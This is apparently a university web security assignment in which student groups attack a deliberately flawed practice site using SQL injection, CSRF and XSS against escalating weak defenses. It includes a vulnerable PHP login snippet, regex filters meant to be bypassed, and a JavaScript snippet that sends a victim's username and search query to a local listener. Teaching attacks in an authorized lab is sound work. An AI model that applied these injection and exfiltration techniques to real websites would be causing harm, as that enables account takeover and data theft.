Assignment Five: Web Security (Group Assignment)

This project presents an insecure website that you will attack. You will focus on three common classes of vulnerabilities: SQL injection, cross-site request forgery, and cross-site scripting. We will present you with several flawed defenses for each of these classes. By exploiting these vulnerabilities, you will improve your own understanding of secure web application programming and get a taste of how web security analyst may probe a customer’s product. This is a group assignment and must be done in groups of two or three only. You will complete three parts in this assignment, and each group member must contribute to all of the parts.

Assignment Sections
Part 1: SQL Injection
Part 2: Cross-Site Request Forgery (CSRF)
Part 3: Cross-Site Scripting (XSS)
Part 4: Better Defenses Writeup


This project asks you to perform several tasks that would be considered network attacks in many situations. For this project, you have our permission to target a website that we are providing for this purpose. Attempting the same kinds of attacks against other websites without authorization is prohibited by law and university policies. You must not attack any website without explicit permission from an authorized administrator of that website.

The purpose of this assignment is to help you become familiar with three specific vulnerability classes. You may also notice other security flaws on this site, such as insecure password handling and a lack of HTTPS. Exploiting any vulnerability that is not directly instructed below is out of scope for this assignment. In particular, exploiting (either passively or actively) any vulnerability that allows you to view or tamper with another group’s work will be considered academic misconduct in violation of Princeton University’s “Rights, Rules, Responsibilities.”

Target Website Scenario

You will play the role of a security contractor for a fictitious startup named “BUNGLE.” This startup is about to launch its first product – a search engine – but their investors are nervous about security problems. Unlike the bunglers who developed this site, you’re studying information security, so the investors have hired you to perform a security evaluation before it goes live.

A prototype version of the BUNGLE search engine is live at The site is written using the Python Bottle framework. Although this framework has built-in mechanisms to prevent certain vulnerabilities, the bunglers in charge of performance optimization disabled or circumvented many of them to “improve the user experience.”

In addition to providing search results, the site manages user sessions and search histories. It stores usernames, passwords, and search history in a MySQL-style database. Your colleagues have determined that the website responds to the following five paths:

Page Relative Path/URL Request Type Details
Home Page / GET The main page displays a search form. When submitted, this search form generates a GET request to /search with a parameter called q. If there is no user attached to the session, then the main page will also display a form that gives the user an option to log into the site or create an account. This form submits a POST request to /login or /create.
Search Results /search GET This page will print the search query string and search results for that query in response to a GET request with query parameter q. If the session has a logged-in user, then the page will display the user’s recent search history in a sidebar. This prototype is not connected to the search indexer, so you will not see any real search results.
Login Handler /login POST This handler accepts POST requests with two parameters: username and password. It checks the database to see if a user with those credentials exists. If so, then it sets a login session cookie and redirects the browser back to the home page. The cookie tracks which user is logged into each current session; manipulating or forging this cookie is not part of this project.
Logout Handler /logout POST This handler accepts a POST request with no parameters. If a login session cookie is set, then it will be deleted/invalidated. The browser is redirected to the home page.
Create Account /create POST This handler accepts a POST request with two parameters: username and password. It inserts the credentials into the database, unless the username is already present. It then sets a login session cookie for that user and redirects the browser to the home page.

Defense Levels: The bunglers have been experimenting with some primitive defense mechanisms to protect against web attacks, so you must demonstrate unique attacks against each defense level. The sections below will describe the defense mechanisms for each part. It is important to note that the defense mechanisms for part two and three are invoked using drop-down menus at the top of each page. These drop-down menus allow you to change the defense mechanisms to various levels. The solutions you submit must override these selections by including the extra csrfdefense=n and/or xssdefense=n parameters in the target URL, as specified by each of the sections below. Attempting to subvert the mechanism for changing defense levels will award no credit for any of the attacks. Be sure you are testing your solutions with the correct defense levels!

Tools and Resources

This assignment depends on more background knowledge than a lecture could teach. Do not be afraid to search online for basic tutorials on web application technologies or vulnerabilities and exploits, just be sure to respect the Collaboration Policy. Here are some examples of tools and resources that may help you get started:

One very valuable resource for anyone who touches web programming is the Open Web Application Security Project (OWASP). It has many different articles and best practices for both defending and auditing websites and web applications. The following “cheat sheets” in particular should be useful for you:

Getting Started

Please complete this assignment using the same VM as the previous assignment to help keep your attacks consistent with our solutions/testing environment. Log into the virtual machine, download this assignment’s files to the virtual machine, and proceed to the following parts. You will submit your solutions in a zipped directory of various text files that are described in each part of the assignment.

Part 1: SQL Injection

Your first goal is to demonstrate SQL injection attacks that log you into arbitrary user accounts without knowing the password. In order to protect other students’ accounts, you will perform these attacks on a series of separate login forms outside of the default BUNGLE website. For each of the following defenses, exploit a SQL injection vulnerability that successfully logs you into the user account named “victim”. When you are successful, you will see a page titled “Login successful! (victim)” and it will instruct you as to what should go in your submission file.

0. No Defenses

Defense None
Submit sql_0.txt as instructed by the successful login page

1. Simple Escaping

Defense escapes any single quote ' by replacing it with two single quotes
Submit sql_1.txt as instructed by the successful login page

2. Escaping and Hashing

The server now uses the following PHP code to escape the username and apply the MD5 hash function to the password:

if (isset($_POST['username']) and isset($_POST['password'])) {
    $username = mysql_real_escape_string($_POST['username']);
    $password = md5($_POST['password'], true);
    $sql_s = "SELECT * FROM users WHERE username='$username' and pw='$password'";
    $rs = mysql_query($sql_s);
    if (mysql_num_rows($rs) > 0) {
        echo "Login successful!";
    } else {
        echo "Incorrect username or password";

This will be more challenging than the previous two defenses. You need to write a program that generates a working exploit. You can use any language you like, but pay close attention to the size of your search space and the performance of your program. Consider using C to avoid unnecessary computational overhead, but focus primarily on reducing the search space of your program.

Defense escaping applied to the username and MD5 hashing applied to the password
Submit sql_2.txt and (containing source code for your program)

3. SQL Extra Credit

This defense level is testing a different database configuration. Your job is to use SQL injection to retrieve the following information:

  1. The name of the database.
  2. The version of the SQL server.
  3. All of the table names in the database.
  4. A secret string hidden in the database.
Defense new database configuration (extra credit)
Submit sql_3.txt (containing a list of the URLs/queries you tried and the four pieces of information above)

Example submission file:

Name: DB name
Version: DB version string
Tables: comma separated names
Secret: secret string

What to submit:

For 1.0, 1.1, and 1.2, when you successfully log in as victim, the server will provide a URL-encoded version of your form inputs. Submit the appropriate text files with each containing only this line. For 1.2, also submit the source code for the program you wrote, as a zip file ( For 1.3, submit a text file as specified if you attempt the extra credit.

Part 2: Cross-Site Request Forgery (CSRF)

Your next step is to demonstrate CSRF vulnerabilities against the login form. BUNGLE has provided two variations of this implementation for you to test. Your goal is to construct attacks that cause a victim to log into an account you control. This will cause all of the victim’s search history to save into an account you can monitor.

For each of the following defenses, create an HTML file that logs a victim into BUNGLE with the username attacker and password l33th4x. The HTML file should log into the account with no interaction; it should not display any evidence of an attack (i.e., just a blank page). The next time the victim’s browser visits the BUNGLE page, it should say “logged in as attacker.”

0. No Defenses

Defense None
Submit csrf_0.html as instructed above

1. Token Validation

The server will now set a cookie named csrf_token with a random 16-byte value and include the value as a hidden field in the login form. When the form is submitted, the server will verify that the client’s cookie matches the value in the form. The CSRF Prevention Cheat Sheet will be very helpful here. You should consider exploring cross-site scripting attacks to help circumvent this defense.

Defense CSRF token set and included as hidden form field
Submit csrf_1.html as instructed above

2. Token Validation without XSS (Extra Credit)

This is exactly the same as the previous task, but you are no longer allowed to use XSS. This should be impossible unless there is a mistake in the implementation of the project.

Defense CSRF token set and included as hidden form field
Submit csrf_2.html as instructed above

What to submit:

For each defense level, submit an HTML file with the appropriate name. Be sure your exploits are targeting the correct defense levels. Your code must be self-contained, but you are allowed (and encouraged) to use inline JavaScript imports for jQuery and jQuery cookies library (i.e., and

Test your solutions by opening them as local files in a new private browser session with the VM web browser and then browsing to the BUNGLE page in a new tab; you should see that the new tab is already logged into the attacker account.

Part 3: Cross-Site Scripting (XSS)

Your final goal is to demonstrate XSS attacks against the BUNGLE search box, which does not properly filter input before echoing it to the results page. For each of the defenses below, your goal is to construct a URL that will execute the payload described below. Your constructed URL should execute the payload when it is pasted into the browser address bar or clicked as a link. We recommend that you begin testing a simple payload such as alert(0); before moving to the full payload. Note that you should implement the payload once, then encode it in different ways that bypass each of the different defenses.

The payload is simply a program or code-snippet that the attack will execute in a victim’s browser. The goal of your payload is to steal the username and most recent search query of the victim. When a victim clicks on your malicious URL or pastes it into the browser address bar, the payload will steal the username and the search query from the browser and send it to the attacker. For this assignment, you can construct the destination for your exfiltration using javascript code similar to this snippet:

var username = "victim_username"                // replace these lines with the actual
var last_query = "victim's last search query"   // values you have stolen from the victim

var url = encodeURI(`http://localhost:31337/stolen?user=${username}&last_search=${last_query}`)

You can use this log_listener python script to test your exploit. In a terminal window, find the file you just downloaded then run python When your exploit work successfully, you will see the username and search query reported in the terminal window.

There are five levels of defense for this part of the assignment. In each case, you must submit the simplest attack that you can find. Each defense level must have a different solution in your submission for full credit. Each text file you submit should have only the malicious URL that will execute your exploit.

0. No Defenses

Defense None
Submit xss_0.txt as instructed above and xss_payload.html containing a human-readable version of your payload

1. Remove “script

Defense filtered = re.sub(r"(?i)script", "", input)
Submit xss_1.txt as instructed above

2. Remove Several Tags

Defense filtered = re.sub(r"(?i)script|<img|<body|<style|<meta|<embed|<object","", input)
Submit xss_2.txt as instructed above

3. Remove Some Punctuation

Defense filtered = re.sub(r"[;'\"]", "", input)
Submit xss_3.txt as instructed above

4. Encode < and > (Extra Credit)

This should be impossible unless there is a mistake in the implementation of the project.

Defense filtered = input.replace("<", "&lt;").replace(">", "&gt;")
Submit xss_4.txt as instructed above

What to submit:

Your submission for each level of defense will be a text file with the appropriate filename and containing a single URL. When the URL is loaded into the victim’s browser, your payload should execute as described above. Your code must be self-contained, but you are allowed (and encouraged) to use inline JavaScript imports for jQuery and jQuery cookies library (i.e., and

Part 4: Better Defenses Writeup

For each of the three classes of vulnerability (SQL injection, CSRF, and XSS), write a short paragraph of advice that describes the best practices for defending against these attacks. Be sure to understand what the current state of the art defenses are and describe them in just enough detail to demonstrate that. You will submit this in part4/writeup.txt.

Submission Requirements

You will submit all of your files in the same structure as the assignment files you downloaded. Please zip the directory and upload it to Gradescope with this directory structure:

  • part1/
    • sql_0.txt - 1.0 No Defenses
    • sql_1.txt - 1.1 Simple Escaping
    • sql_2.txt - 1.2 Escaping and Hashing
    • - Source code for 1.2 Escaping and Hashing
    • sql_3.txt - 1.3 SQL Extra Credit
  • part2/
    • csrf_0.html - 2.0 No Defenses
    • csrf_1.html - 2.1 Token Validation
    • csrf_2.html - 2.2 Token Validation (Extra Credit)
  • part3/
    • xss_payload.html - Human-readable payload script
    • xss_0.txt - 3.0 No Defenses
    • xss_1.txt - 3.1 Remove script
    • xss_2.txt - 3.2 Remove Several Tags
    • xss_3.txt - 3.3 Remove Some Punctuation
    • xss_4.txt - 3.4 Encode < and > (Extra Credit)
  • part4/
    • writeup.txt - Better Defenses Writeup